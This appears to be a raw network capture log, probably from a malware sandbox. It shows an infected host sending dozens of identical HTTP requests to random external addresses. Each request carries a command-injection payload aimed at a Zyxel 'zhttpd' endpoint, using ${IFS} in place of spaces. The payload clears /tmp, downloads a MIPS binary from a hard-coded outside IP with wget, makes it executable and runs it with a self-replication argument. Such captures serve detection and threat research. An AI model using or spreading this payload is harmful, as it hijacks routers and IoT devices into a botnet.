                                    Jan 13, 2024 19:02:42.375262976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6503192.168.2.1358520115.243.147.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375327110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6504192.168.2.1360638170.155.166.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375355005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6505192.168.2.1342672112.144.82.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375411987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6506192.168.2.1342410157.123.198.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375447035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6507192.168.2.1357866151.76.128.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375505924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6508192.168.2.1342338195.230.11.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375605106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6509192.168.2.1349958138.219.150.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375644922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6510192.168.2.135799092.222.8.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375771046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6511192.168.2.134211688.96.68.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375807047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6512192.168.2.1346636168.81.120.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375910044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6513192.168.2.1349714168.190.83.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375946999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6514192.168.2.135519438.76.33.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375998020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6515192.168.2.1342920204.111.46.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376080990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6516192.168.2.1350928192.62.190.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376146078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6517192.168.2.1345832189.48.214.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376214981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6518192.168.2.1345378165.128.54.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376251936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6519192.168.2.1354046128.116.159.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376338005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6520192.168.2.1342758163.51.47.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376415014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6521192.168.2.1351128153.46.203.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376462936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6522192.168.2.1342834122.193.190.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376513958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6523192.168.2.134179281.199.18.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376589060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6524192.168.2.133853436.229.152.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376672029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6525192.168.2.133589276.245.14.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376728058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6526192.168.2.1337830114.137.87.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376763105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6527192.168.2.1342422165.194.56.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376837015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6528192.168.2.134709445.109.70.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376903057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6529192.168.2.135193293.33.59.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376943111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6530192.168.2.1335572206.237.117.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.376988888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6531192.168.2.1358638135.230.98.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377067089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6532192.168.2.133823260.181.196.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377110004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6533192.168.2.1351642129.112.50.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377177000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6534192.168.2.1351136122.129.174.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377249956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6535192.168.2.1357176196.160.188.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377301931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6536192.168.2.133796652.134.220.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377347946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6537192.168.2.1339978128.113.188.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377418041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6538192.168.2.135130444.192.44.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377490044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6539192.168.2.135790814.172.119.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377533913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6540192.168.2.13337622.206.130.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377588034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6541192.168.2.1333574175.181.7.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377635002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6542192.168.2.135163276.115.140.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377686977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6543192.168.2.1344148114.90.133.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377737999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6544192.168.2.1346614178.21.42.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377806902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6545192.168.2.13415225.177.166.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377904892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6546192.168.2.1340728188.222.211.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.377943993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6547192.168.2.1334244168.209.250.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378032923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6548192.168.2.1356560212.165.97.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378091097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6549192.168.2.13588942.162.161.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378135920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6550192.168.2.1349008101.145.141.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378206968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6551192.168.2.1357488151.60.143.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378271103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6552192.168.2.1348288165.22.244.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378346920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6553192.168.2.13597425.37.32.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378418922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6554192.168.2.133373671.210.175.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378494024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6555192.168.2.1338096177.217.166.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378542900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6556192.168.2.133514419.188.125.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378582001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6557192.168.2.13394988.115.213.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378622055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6558192.168.2.1341444192.179.129.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378691912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6559192.168.2.1338510213.59.191.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378726959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6560192.168.2.1351880109.102.130.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378815889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6561192.168.2.135239243.55.80.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378879070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6562192.168.2.135078066.22.17.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.378959894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6563192.168.2.1341918188.130.44.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379019022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6564192.168.2.1360926157.250.245.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379086018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6565192.168.2.134606095.68.80.133443
                                    TimestampBytes transferredDirectionData
